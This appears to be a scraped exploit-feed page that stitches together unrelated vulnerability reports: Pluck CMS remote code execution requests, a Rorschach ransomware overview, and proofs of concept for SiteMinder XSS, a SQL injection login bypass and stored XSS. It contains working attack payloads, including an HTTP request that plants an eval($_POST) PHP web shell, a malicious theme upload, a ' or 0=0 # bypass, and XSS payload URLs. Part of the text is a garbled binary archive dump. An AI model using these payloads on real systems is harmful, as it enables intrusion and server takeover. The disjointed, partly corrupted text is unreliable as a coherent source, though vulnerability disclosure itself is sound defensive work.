File Upload vulnerability in PluckCMS v.4.7.10 dev versions allows a remote attacker to execute arbitrary code via a crafted image file to the the save_file() parameter.

admin.php:

language.php：

save\_file():

"../../../images/wphp.jpg" Be written to \\data\\settings\\langpref.php

Users can upload a picture file containing malicious code to getshell.

POST /pluck-4.7.10-dev1/admin.php?action=language HTTP/1.1  
Host: 127.0.0.1:83  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1:83/pluck-4.7.10-dev1/admin.php?action=language  
Cookie: LQUKaS\_admin\_username=admin; Hm\_lvt\_f6f37dc3416ca514857b78d0b158037e=1570503836; PHPSESSID=a0bhen6shpeifgc20p0l23pmj1  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 70

cont1=../../../images/php.jpg&save=%E5%82%A8%E5%AD%98&cmd=echo "2333";

CVE-2020-20718: File contains vuln pluck 4.7.10 dev version · Issue #79 · pluck-cms/pluck

An issue discovered in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary php code via the hidden parameter to admin.php when editing a page.

**Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page**

Vulnerability location：  
data\\inc\\functions.admin.php 531-535 line  

Saves the hidden parameter passed by the POST request to php, but does not escape the special character (') in the value, which can directly close the php syntax remote execution command, such as phpinfo(), eval(), etc.

Demo：  
After the installation is successful, go to the management background.Create a new page, enter a title and content Select "Show webpage",submit the request and then grab the request packet to modify the value of the hidden parameter to "no"; phpinfo();'"  

    POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
    Host: 192.168.80.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
    Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 131
    
    title=aaaa&seo_name=&content=%3Cp%3Eaaaa%3C%2Fp%3E&description=&keywords=&hidden=no';phpinfo();'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98
    

http://192.168.80.1/pluck-4.7.10-dev2/?file=aaaa  

Write a sentence Trojan

    POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
    Host: 192.168.80.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
    Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    
    title=bbbb&seo_name=&content=%3Cp%3Ebbbb%3C%2Fp%3E&description=&keywords=&hidden=no';@eval($_POST[b]);'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98
    

Use chopper connection

CVE-2020-20918: Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page · Issue #80 · pluck-cms/pluck

Adiscon LogAnalyzer v4.1.13 and before is vulnerable to SQL Injection.

**View system messages via web**

Syslog messages  
Windows Events  
Status Reports  
Statistics  
Web based

  

Adiscon LogAnalyzer

  
Adiscon LogAnalyzer is a web inter-  
face to syslog and other network event data. It provides easy brow-  
sing, analysis of realtime network events and reporting services.

Reports

  
Reports help to keep an eye on network activity. It consolidate syslog and other event data providing an easy to read sheet. Charts help to see important things at a glance.

LogAnalyzer is part of Adiscon’s MonitorWare line of monitoring applications. It runs both under Windows and Unix/Linux. The database can be populated by MonitorWare Agent, WinSyslog or EventReporter on the Windows side and by rsyslog on the Unix/Linux side. LogAnalyzer itself is free, GPLed software (as are some other members of the product line).

CVE-2023-34600: Home - Adiscon LogAnalyzer

File upload vulnerability in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary code and access sensitive information via the theme.php file.

pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme  
Demo:  
After the installation is successful, go to the management background.  
  
options->choose theme->install theme  
  

vul-url：  
http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall  
According to the default template, the theme is faked with the content of the theme shell.php.zip as follows:  
  
Insert phpinfo(); in the theme.php file;  

upload

    POST /pluck-4.7.10-dev3/admin.php?action=themeinstall HTTP/1.1
    Host: 192.168.80.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall
    Cookie: PHPSESSID=en364hjlvg84vpdvmv9gdlc0h2
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=---------------------------10771789627341
    Content-Length: 2441
    
    -----------------------------10771789627341
    Content-Disposition: form-data; name="sendfile"; filename="shell.php.zip"
    Content-Type: application/x-zip-compressed
    
    PK���     楽VO            
       shell.php/PK���   � 漇VO?K�?   ��  �   shell.php/info.phpe幧
    ?�嗭吘肞<j呼?鐴D$$?殟,趱M*侾標7薬p抡U譣??
    �?0?z?�N%???
    ?.?魫G_�?D尞锖i氌`祂?&犇 梿}? ?顪m?c]照j>胜?4A燫m??�桯[?>?�镗G�4慺蓈3阒F魠�?PK���   � 嫇OO蘺貔{�  ?  �   shell.php/style.css誚M彌0�=o~叆≧籞睝毻*?鞧玘zj?�喐k02&洿??�唋音凿惸虥?笃N溃=??p鴾�^f?r婆
    M?险{=箞y&?鞼鑷 A�n圖呔贸&丨^皭b懶l呠|窞糔&x舎?�m桡镛C?;镈$?K?�霥@8[ZPIⅢ?攖K蚊n鴸?簟z�囄R挄h扮?煦tt斤?杞煆驱3:?郚拃伹NMQ2厡h?檢n垭"荙D长?�?歭?y嬟〕
    罸璤h$7+碶ㄤ脩0U蘺A祎A�啀狤Fb群p?&戒虠?]_"鐌舚?@椬-?u?笖<�y 挛銫頥ク�6Do莀茇猰?緂??靷?Jw咁n栽讘<�?Es貦汛竻�覦嬄颖�k墐偝瞆| �!紂[垄ZN?刅}恶郎溃+=pGU菥|/梿倩?�??MS紮O业Z, 嵻3葥駥 ^蕚Fa??\@泴�?傗?氶﹚�x桷挩?钨(亵袪昀�鯫2?�?蛸�_江陰踴灶歳鐼_鳜og蹪~顳衜碬�K瞍m覐]@-锾?鐠�游J璋梀伶c�;h选To1p?+?0V蠁﹊"鹁襆臣琄b铧;A1籅_	?IC|??NA�?&�fわ?�姚.潥4�鉵5u尕o蝜?,�?ぢ?蟲?黋 _炧膿胬7?�偶睊�>I*�盡{;Dk�嘜乤遥墽Y摊写縛?駗囐Y昝d脂鷺b闔h|�?蕠瓞F/?霭澅琽瞀盡�k睬辵4_簝I鸜�捚?�O�N扇惋帖�?闂鷍	8?$=睋
    瀭?T窰1[�m觊D))
    ?还^gT�€�郪�3
    蚾€i擣 服h爓,(英?_!婀i線郯*GO�.%W抝�c摫胎?B痤lAⅤ萿酊�PK���   � 筍VO鱪鷸?  ?  �   shell.php/theme.php}S羘贎�=�?橒睩*?9�?�寓:�%FmOh?鉛斓e痗慂褫怠敀驸�蠜麈i<�M?�J�?BY��*F圖?JI�?牟D�\��猟飔;�#!戂d避豸+锳V 顒采}C 嶳 ???BF欇�v;�ot=?
    ~�?佌鷵繕傉斠Y0?_?�\?<〣剨淫?+V*浚串kЬu瞓K僄?*�襼賞�鍀;?Md9~C?�-?Mw	撣闭n�?�~鵼��B苪l`敞�7)*f聻?�=6=g|o"�?
    3轠aぎMv5奭PB%h,渇擝aS秢瓡w@=適次M适&UB> I剏睵塛詸kX??欎?Ju磛髺禍m祐	灛輁X;i:.@V 矷F3?u\?笶蒊濧\`t鰨?羭硚鬗�M箔悗?忨T?e�鼈<锌馏���g鐢'U�右\曞5瘹鉙<^�5w琮�PK��? �     楽VO            
     $       �       shell.php/
           � � 柭萵€堈�梷Kt€堈�袘€]y堈�PK��? �   � 漇VO?K�?   ��  � $           (   shell.php/info.php
           � � �4=t€堈�u�7瘈堈�]�?|堈�PK��? �   � 嫇OO蘺貔{�  ?  � $           ��  shell.php/style.css
           � � €怷DC冋�)A7瘈堈��l洹|堈�PK��? �   � 筍VO鱪鷸?  ?  � $           ?  shell.php/theme.php
           � � 9晸€堈�yg7瘈堈�?察z堈�PK��    � � ?  ?    
    -----------------------------10771789627341
    Content-Disposition: form-data; name="submit"
    
    Upload
    -----------------------------10771789627341--
    
    

**1.default theme**

  
View site  

**2.choose shell.php theme**

  

View site http://192.168.80.1/pluck-4.7.10-dev3/  

phpinfo();Function is executed

_**The vulnerability exists in the latest pluck-4.7.10-dev2 pluck-4.7.10-dev3. The pluck-4.7.10-dev4 version cannot be uploaded due to bugs in the program, but in theory the RCE vulnerability exists. In pluck-4.7.10-dev4 version**_

CVE-2020-20919: pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme · Issue #85 · pluck-cms/pluck

Cross Site Scripting vulnerability in Typora v.0.9.79 allows a remote attacker to execute arbitrary code via the mermaid sytax.

CVE-2020-21058: typora(0.9.79) XSS to RCE · Issue #2959 · typora/typora-issues

Learn how the latest ransomware variant has heightened attack execution speed and what that means for cybersecurity operations.

There has always been a competition in the ransomware world, with attackers trying to improve the speed of campaign execution and organizations continuously innovating to get ahead of those attacks. Speed is so decisive that ransomware-as-a-service (RaaS) platforms even advertise the speed of execution for prospective ransomware affiliates. LockBit, one of the most successful ransomware groups, has publicly listed its encryption speed versus its competitors' speed to demonstrate its advantage. In short, speed is critical on both sides of the ransomware battle.

Rorschach, one of the newest ransomware variants, has officially taken the "encryption speed king" title from LockBit 3.0. The Rorschach variant was first detected in April 2023 and is a customized strain of the Babuk ransomware code. Rorschach brings speed into the spotlight and warrants a closer look at how ransomware creators increase speed across multiple dimensions of their victims' environment.

**Malware Propagation Speed**

One important speed component is the ability to quickly spread malware as far and wide as possible. In the past, ransomware groups have leveraged many techniques for fast propagation, including supply chain attacks and using existing IT and security tools to propagate their malware.

However, Rorschach has built and demonstrated an interesting self-propagating and autonomous capability that leverages Active Directory (AD) Domain Group Policy Objects (GPO). This enables the malware to rapidly propagate across the network and execute ransomware on every endpoint at blistering speeds. Because of this, the Rorschach variant has pushed the needle further than ever with these interesting innovations for self-propagation.

To counter this innovation, organizations must adopt tools that combat self-propagation, such as active defense technology, which deals with ransomware in real time and detects attackers as soon as possible.

**Data Encryption Speed for Extortion**

On Windows endpoints, Rorschach's creators have carefully chosen to use HC-128, a stream cipher that encrypts large streams of file data with impressive performance. Rorschach ransomware uses the asymmetric key exchange method, which is based on Curve25519. It's efficient in both computational performance and memory consumption while simultaneously retaining strong security.

Like many other ransomware strains, including LockBit and Babuk, Rorschach encrypts only parts of a file instead of the entire file's contents. This tactic is known as intermittent encryption, which has become popular in the last couple of years for its efficiency and speed. Encrypting only parts of the file dramatically reduces the time required to complete the data encryption. By shortening the encryption phase of an attack, ransomware operators give security tools less opportunity to detect them. Data encryption is the visible part of an attack, and attackers are shortening that window to better their odds in the race against defenders.

Like LockBit and other well-known ransomware, Rorschach also leverages parallelism and multithreading for high-performance speedy encryption. Because Rorschach ransomware implementation is customized for each operating system type, it leverages specific Windows capabilities known as I/O completion ports for efficient multithreaded encryption. This technique is borrowed from LockBit 3.0, REvil, Hive, BlackMatter, and DarkSide.

While the data encryption speed rankings among ransomware gangs is interesting, it is important to note that virtually all modern ransomware variants already perform data encryption very quickly. Unfortunately, all are much faster than what most security teams or tools are equipped to deal with.

However, while Rorschach does outpace competitors in speed in some realms, it currently does not appear to exfiltrate data for double extortion. This is in comparison to other ransomware gangs, including LockBit, that first exfiltrate enterprise data. While data encryption is the visible part of a ransomware attack, data exfiltration is the invisible race against defenders. Ransomware actors typically exfiltrate large amounts of data for double extortion before beginning data encryption.

**Staying Under the Radar of Defenders**

One of Rorschach's particularly innovative moves is its ability to stay under the radar by using deception technology — a double-edged sword that is useful for attackers and defenders. Rorschach's advanced security evasion capabilities leverage deception techniques and concepts for malicious purposes, including using obfuscation techniques, valid domain user and service accounts, and argument spoofing techniques to hide the true capabilities of the ransomware.

This kind of defense evasion is new to ransomware threats, but it's not new in the cybersecurity world. To combat Rorschach's technique for self-propagation using AD GPOs and high-speed campaigns, defenders need solutions that can detect and respond to real-time, novel, and autonomous ransomware capabilities.

Rorschach ransomware has borrowed innovations from previously successful ransomware groups including LockBit, Babuk, and REvil and built on their success by adding lightning-fast innovations. The Rorschach variant demonstrates the importance of continuous defender innovation, as well as the need to counter attacker movement in real time.

Rorschach Ransomware: What You Need to Know

Symantec SiteMinder WebAgent version 12.52 suffers from a cross site scripting vulnerability.

    Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)Google Dork: N/ADate: 18-06-2023Exploit Author: Harshit JoshiVendor Homepage: https://community.broadcom.com/homeSoftware Link: https://www.broadcom.com/products/identity/siteminderVersion:  12.52Tested on: Linux, WindowsCVE: CVE-2023-23956Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221*Description:*I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I havediscovered in the  Symantec SiteMinder WebAgent. The vulnerability isrelated to the improper handling of user input and has been assigned theCommon Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for thisvulnerability is 5.4.Vulnerability Details:---------------------*Impact:*This vulnerability allows an attacker to execute arbitrary JavaScript codein the context of the affected application.*Steps to Reproduce:**First:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *SMAGENTNAME *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="**Second:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *TARGET *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*

Symantec SiteMinder WebAgent 12.52 Cross Site Scripting

WordPress Theme Medic theme version 1.0.0 suffers from having a weak password recovery mechanism for the forgot password flow.

    # Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password# Dork: inurl:/wp-includes/class-wp-query.php# Date: 2023-06-19# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html# Version: 1.0.0 (REQUIRED)# Tested on: Windows/Linux# CVE: CVE-2020-11027import requestsfrom bs4 import BeautifulSoupfrom datetime import datetime, timedelta# Set the WordPress site URL and the user email addresssite_url = 'https://example.com'user_email = 'user@example.com'# Get the password reset link from the user email# You can use any email client or library to retrieve the email# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'with open('password_reset_email.html', 'r') as f:    email = f.read()    soup = BeautifulSoup(email, 'html.parser')    reset_link = soup.find('a', href=True)['href']    print(f'Reset Link: {reset_link}')# Check if the password reset link expires upon changing the user passwordresponse = requests.get(reset_link)if response.status_code == 200:    # Get the expiration date from the reset link HTML    soup = BeautifulSoup(response.text, 'html.parser')    expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]    expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')    print(f'Expiration Date: {expiration_date}')    # Check if the expiration date is less than 24 hours from now    if expiration_date < datetime.now() + timedelta(hours=24):        print('Password reset link expires upon changing the user password.')    else:        print('Password reset link does not expire upon changing the user password.')else:    print(f'Error fetching reset link: {response.status_code} {response.text}')    exit()

WordPress Theme Medic 1.0.0 Weak Password Recovery Mechanism

WordPress Kero jQuery/HTML Dashboard PRO theme version 2.3.86 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : WordPress - Kero jQuery/HTML Dashboard PRO Auth BY pass Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit)                                            | | # Vendor    : https://dashboardpack.com/theme-details/kero-jquery-html-dashboard-pro/                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================P0C :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /panel/sign-in.php[+] User & Pass :  ' or 0=0 #[+] https://127.0.0.1/spdmuniversal.in/panel/sign-in.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |=======================================================================================================================================

WordPress Kero jQuery/HTML Dashboard PRO 2.3.86 SQL Injection

Student Study Center Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)# Date of found: 12/05/2023# Exploit Author: VIVEK CHOUDHARY @sudovivek# Version: V1.0# Tested on: Windows 10# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/# CVE: CVE-2023-33580# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33580Vulnerability Description -    The Student Study Center Management System V1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application. The underlying issue lies in the system's failure to adequately sanitize and validate user-provided input within the "Admin Name" field on the Admin Profile page, thereby allowing attackers to inject arbitrary JavaScript code.Steps to Reproduce -    The following steps demonstrate how to exploit the Stored XSS vulnerability in the Student Study Center Management System V1.0:            1.  Visit the Student Study Center Management System V1.0 application by accessing the URL: http://localhost/student-study-center-MS-PHP/sscms/index.php.        2.  Click on the "Admin" button to navigate to the admin login page.        3.  Login to the Admin account using the default credentials.                - Username: admin                - Password: Test@123        4.  Proceed to the Admin Profile page.        5.  Within the "Admin Name" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}.        6.  Click on the "Submit" button.        7.  Refresh the page, and the injected payload will be executed.As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.

Tag

#windows